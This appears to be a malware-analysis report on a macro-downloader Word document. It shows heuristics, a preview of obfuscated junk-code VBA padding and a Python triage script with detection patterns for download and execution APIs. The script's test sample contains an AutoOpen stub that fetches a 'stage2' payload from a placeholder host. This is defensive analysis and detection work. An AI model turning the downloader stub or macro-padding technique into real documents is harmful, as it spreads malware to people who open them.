Verdict: MALICIOUS (Risk Score: 222)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The file is a malicious Office document containing VBA macros, including an AutoOpen macro that calls CreateObject. ClamAV identifies it as Doc.Macro.VBSDownloader-6336817-0, which strongly suggests its purpose is to download and execute a secondary payload. An auto-execution entry point combined with CreateObject is the classic shape of a macro downloader: the trigger fires on document open without user interaction, and CreateObject instantiates the COM object (shell, HTTP client or file stream) that fetches and runs the next stage. The extracted source (macros.bas, below) is padded with junk code: functions that fill large arrays from undefined names and assign random strings to variables that are never read, a common technique for defeating signature matching. The truncated preview shows only that padding, so the CreateObject call and any download logic are not visible in it. No second-stage URL was recovered by static analysis; the only extracted URL is the DrawingML XML namespace, which is not a network indicator. The legacy WordBasic finding's statement that no VBA project was recovered conflicts with the olevba extraction and should be read as an overlapping signal rather than a separate capability.
Heuristics (7)

- ClamAV: Doc.Macro.VBSDownloader-6336817-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0.
- VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS): Document contains VBA macro code.
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro.
- CreateObject call [high] (OLE_VBA_CREATEOBJ): CreateObject call.
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace carried by any document with drawing content; it is not a download or C2 indicator and should not be blocked or hunted.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17564 bytes | f3fc4bb77d37012e29a046383f28e43b7caa65a413fa2d2e76cf9ce8a7e8d963 |

Preview (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Function ArsRSUh()
spWywkz = 4192
Dim FFXgwCLyNSr(4192)
FFXgwCLyNSr(1697) = CPGBgXZNW
FFXgwCLyNSr(3200) = RLvCbFuMD
FFXgwCLyNSr(1106) = BapYEBNPvSe
FFXgwCLyNSr(1820) = FwXgusde
FFXgwCLyNSr(3192) = XdfgDef
FFXgwCLyNSr(1131) = EvkUcWdkaHM
FFXgwCLyNSr(1568) = kVrhuCvENVm
FFXgwCLyNSr(2197) = LYWmmsSGF
FFXgwCLyNSr(295) = sMBwPUPk
FFXgwCLyNSr(869) = ytSgAfDUN
FFXgwCLyNSr(1817) = CapSUdZMHHN
FFXgwCLyNSr(209) = wnCNmEKRuA
FFXgwCLyNSr(1243) = FdcrSNCpxNH
FFXgwCLyNSr(1964) = ggRrAAf
FFXgwCLyNSr(2670) = cKHpkafXVUP
FFXgwCLyNSr(2985) = uNCmLXadFR
FFXgwCLyNSr(463) = kCgEctbLY
FFXgwCLyNSr(1679) = SgxmKfyAWA
FFXgwCLyNSr(271) = kkTeWVwK
gVaHPrb = "gezdcbnS"
ANSgrXe = "KGctbmeX"
HYyKpGMvbP = "kgMGbykYND"
dPDFnrxRSK = "nCmYbKFerG"
dWZUvMgpFwT = "yNwRBanwh"
FyDStNGHz = "xgBYPnY"
GGxxfSk = "ZPhSBATcWeU"
xKkyBhFD = "szysuwxMP"
XpGGFrsm = "zaFnrypuSc"
sAXcxVLaUW = "VauFGTskCA"
kxbNSUn = "kfdLfhD"
vmHHrDZCM = "KbwBGSLAE"
GnDGvNyVW = "aHTbDxkC"
FewPRsZpD = "eUCMFUm"
eBuyzWaDTC = "tbSuahmbF"
PzxRmXeWXSD = "psNtZmgkG"
VEfYrsrKb = "MhBZTYKv"
exPeDdNxGFn = "WXWyvPaVG"
rhYEKFdfkED = "mGtzreFNb"
End Function
Function tzxrKeRTGk()
sbDEnMMud = 172
Dim dHyuPCmXC(172)
dHyuPCmXC(119) = DNpkWNWf
dHyuPCmXC(83) = PMyzcYYfdF
dHyuPCmXC(127) = tKbEdPpTcx
dHyuPCmXC(69) = cnhhWGays
dHyuPCmXC(116) = hmrNByr
dHyuPCmXC(129) = htfpdchT
dHyuPCmXC(157) = ceCvYrbb
dHyuPCmXC(79) = HAfawMZcrKE
dHyuPCmXC(143) = GNZXVRsU
dHyuPCmXC(117) = pcuyfRbu
dHyuPCmXC(143) = fDvzKKbepGC
dHyuPCmXC(84) = DVNzEccsmm
dHyuPCmXC(94) = AhUapxvMNv
dHyuPCmXC(159) = sDdBwKCXswp
dHyuPCmXC(155) = zFfkLUkPZ
dHyuPCmXC(123) = nyVEsHwRr
dHyuPCmXC(144) = DrRCfLCXdnr
dHyuPCmXC(131) = vxTbhbyddAw
dHyuPCmXC(139) = eayCykzZAG
TFvvezWgKN = "yWGDNXWX"
WKDSaBLzny = "TybTDWS"
zknMhEtgx = "gShyUPHrvp"
SmhGRMupW = "hRxGDVx"
PxbeRkuFLC = "xCWCvWR"
DnMyZKaPUN = "MLDaKpY"
UubTwxgpE = "GEuPNgGXwc"
pBMAaWGDk = "pNNHwUkryb"
GHWyAzLrDKH = "byHsaLpS"
umNUPVvVmyF = "CBVhVHk"
wPKzgdmkbPR = "rGMeCnpWkg"
XunhGsUm = "AXfHcemKcf"
wTLTtNvPY = "GADrXSyvH"
treNbfhS = "vbcbSEbF"
chwyyDZA = "yUBesphfnS"
chTbHftdBW = "xZXdTYaRd"
MffpEattm = "kEuerYnY"
LcWVHaMcxV = "DsTbAXvZ"
End Function
Function ybeLHvC()
fUsUGBdbcdc = 4338
Dim ehYFMLyaGMg(4338)
ehYFMLyaGMg(1954) = ngHSRADvtgZ
ehYFMLyaGMg(500) = SbwysDyp
ehYFMLyaGMg(2579) = MPrPakMrNV
ehYFMLyaGMg(2578) = frYGGkcM
ehYFMLyaGMg(845) = FYcdFeS
ehYFMLyaGMg(1674) = tMHZFMyb
ehYFMLyaGMg(1724) = bgSZbLGuDZ
ehYFMLyaGMg(2344) = HMhLhUwxUP
ehYFMLyaGMg(138) = esadmpDS
ehYFMLyaGMg(888) = ZxvDPkNAA
ehYFMLyaGMg(3687) = hDfrPff
ehYFMLyaGMg(3503) = skyBWxyAZ
ehYFMLyaGMg(3805) = KRXAdywBpax
ehYFMLyaGMg(1223) = FxwfcpDhpd
ehYFMLyaGMg(115) = VHLYaGk
ehYFMLyaGMg(2894) = XhMGDVpNWDW
ehYFMLyaGMg(4128) = RnwdVUuHy
ehYFMLyaGMg(4165) = vsrfxNAVuE
ehYFMLyaGMg(1343) = DtWnpEh
ehYFMLyaGMg(3267) = pUpnPEazNh
ehYFMLyaGMg(1723) = TrVANtWgPZ
ehYFMLyaGMg(2640) = bdPCahPaeV
ehYFMLyaGMg(926) = fKTkaUBBAkp
zufAfeM = "vkLfPRRY"
vfxsxbKbFm = "SydUyKg"
zbTeTUzLBTR = "MdpLbyr"
ykcfeZTUps = "AABEpEC"
NHMHrZK = "zypsKyM"
ZavGWrTnx = "VLeuFGDkD"
hkABzpFSYS = "TSygKSkp"
fkvmAaBt = "nSsbEYFgZtE"
LXXZBeyANfS = "NYcbRZgN"
cwUTLeMp = "TmruTgnC"
htdzXEGp = "WffPpsTZh"
aSEHUBDnxy = "wsybhpUa"
End Function
Function RcVNnmMGBV()
tbzZXvdDt = 3677
Dim HFAbKggU(3677)
HFAbKggU(2412) = GaMezczDDU
HFAbKggU(964) = YMSfUGNs
HFAbKggU(3491) = KBzsHesms
HFAbKggU(748) = fhXSBZGTHuX
HFAbKggU(3431) = UTsxWkwwzV
HFAbKggU(3426) = nyFZuPwv
HFAbKggU(508) = wKecbXNSe
HFAbKggU(93) = fkdhadDA
HFAbKggU(1806) = ftcZvtku
HFAbKggU(3237) = LkLNNngzkdC
HFAbKggU(2571) = aNKdytR
HFAbKggU(2031) = ... (truncated)
```
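The heuristics above (AutoOpen entry point, CreateObject call, auto-exec combined with exec/download tokens, embedded URL with channel labels) and the junk-code padding visible in the macros.bas preview can be reproduced over decoded VBA source with a small static triage script. The following is an added example written for this page, not the analyzer's, olevba's or ClamAV's own code: the rule names, severities, the 50% dead-store threshold, the `SCHEMA_HOSTS` allowlist and the sample macro are all assumptions constructed for illustration. It takes the text olevba would emit, so it runs offline on the constructed sample and needs only the standard library.

```python
"""Static VBA triage in the style of the report's heuristics (added example,
not the analyzer's or ClamAV's code). Rule names, severities, thresholds and
the sample macro below are constructed for illustration."""
import re
from dataclasses import dataclass, field

# Entry points Office runs on open/close without a click.
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+"
    r"(AutoOpen|AutoExec|AutoClose|AutoNew|Document_Open|Document_Close|Workbook_Open)\b",
    re.IGNORECASE | re.MULTILINE)
# Object-creation/process-execution tokens, and COM classes used to pull a second stage.
OBJECT_EXEC_RE = re.compile(r"\b(CreateObject|GetObject|Shell|ShellExecute)\b", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"\b(URLDownloadToFile|XMLHTTP|ServerXMLHTTP|WinHttpRequest|ADODB\.Stream)\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"'<>()]+", re.IGNORECASE)
# Namespace hosts every OOXML/OLE body carries; a URL there is not a network indicator.
SCHEMA_HOSTS = ("schemas.openxmlformats.org", "schemas.microsoft.com", "www.w3.org", "purl.org")
ASSIGN_RE = re.compile(r"^(?:Set\s+)?([A-Za-z_]\w*)(?:\([^)]*\))?\s*=\s*(.+?)\s*$")
IDENT_RE = re.compile(r"[A-Za-z_]\w*")

@dataclass
class Triage:
    findings: list = field(default_factory=list)  # (rule, severity, detail)
    urls: list = field(default_factory=list)      # (url, channel, is_schema_namespace)
    dead_store_ratio: float = 0.0

    def has(self, rule):
        return any(f[0] == rule for f in self.findings)

    @property
    def verdict(self):
        sev = {f[1] for f in self.findings}
        return "MALICIOUS" if "critical" in sev else "SUSPICIOUS" if "high" in sev else "CLEAN"

def dead_store_ratio(source):
    """Fraction of assignments whose target is never read: the array-fill and
    random-string padding in the macros.bas preview scores close to 1.0."""
    assigned, read = [], set()
    for line in source.splitlines():
        s = line.strip()
        if not s or s.startswith(("Attribute ", "Dim ", "'")):
            continue  # declarations and comments neither assign nor read a value
        m = ASSIGN_RE.match(s)
        if m:
            assigned.append(m.group(1))
            read.update(IDENT_RE.findall(m.group(2)))  # names used on the right-hand side
        else:
            read.update(IDENT_RE.findall(s))
    return sum(1 for n in assigned if n not in read) / len(assigned) if assigned else 0.0

def triage(vba_source, body_text=""):
    t = Triage()
    auto = AUTOEXEC_RE.search(vba_source)
    if auto:
        t.findings.append(("OLE_VBA_AUTOOPEN", "high", auto.group(1)))
    objs = sorted({h.lower() for h in OBJECT_EXEC_RE.findall(vba_source)})
    if objs:
        t.findings.append(("OLE_VBA_CREATEOBJ", "high", ",".join(objs)))
    dl = sorted({h.lower() for h in DOWNLOAD_RE.findall(vba_source)})
    if dl:
        t.findings.append(("VBA_DOWNLOAD_API", "high", ",".join(dl)))
    if auto and (objs or dl):  # trigger plus exec/download token: the AUTOEXEC_EXEC combination
        t.findings.append(("VBA_AUTOEXEC_EXEC", "critical", "auto-exec entry point reaches exec/download tokens"))
    for channel, text in (("macro", vba_source), ("document body", body_text)):
        for url in URL_RE.findall(text):
            host = url.split("/", 3)[2].lower()
            t.urls.append((url, channel, host in SCHEMA_HOSTS))
    if any(not schema for _, _, schema in t.urls):
        t.findings.append(("EMBEDDED_URL", "info", "non-namespace URL present, see channel labels"))
    t.dead_store_ratio = dead_store_ratio(vba_source)
    if t.dead_store_ratio >= 0.5:
        t.findings.append(("VBA_JUNK_CODE", "info", f"{t.dead_store_ratio:.0%} of assignments are dead stores"))
    return t

# Constructed sample: junk padding modelled on the preview plus a minimal AutoOpen
# downloader stub aimed at a reserved .invalid host. Not the real sample's code.
SAMPLE_VBA = '''Attribute VB_Name = "Module1"
Function ArsRSUh()
spWywkz = 4192
Dim FFXgwCLyNSr(4192)
FFXgwCLyNSr(1697) = CPGBgXZNW
FFXgwCLyNSr(3200) = RLvCbFuMD
FFXgwCLyNSr(1106) = BapYEBNPvSe
gVaHPrb = "gezdcbnS"
ANSgrXe = "KGctbmeX"
HYyKpGMvbP = "kgMGbykYND"
End Function
Sub AutoOpen()
Set h = CreateObject("MSXML2.XMLHTTP")
h.Open "GET", "http://example.invalid/stage2", False
End Sub
'''
SAMPLE_BODY = "xmlns:a=http://schemas.openxmlformats.org/drawingml/2006/main"

if __name__ == "__main__":
    r = triage(SAMPLE_VBA, SAMPLE_BODY)
    print(r.verdict, [f[0] for f in r.findings], f"dead stores {r.dead_store_ratio:.0%}")
```

On the constructed sample this yields a MALICIOUS verdict from the auto-exec plus CreateObject/XMLHTTP combination, flags the macro-channel URL while marking the DrawingML namespace URL from the body as benign, and reports 7 of 8 assignments as dead stores. Two caveats a practitioner should keep in mind: the dead-store check works on decoded source only, so it says nothing about the p-code-only case the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic covers, and token matching on obfuscated VBA is easily evaded (string concatenation, Chr() decoding, late-bound calls through CallByName), which is why the report leans on ClamAV and p-code stream inspection in addition to source-level rules.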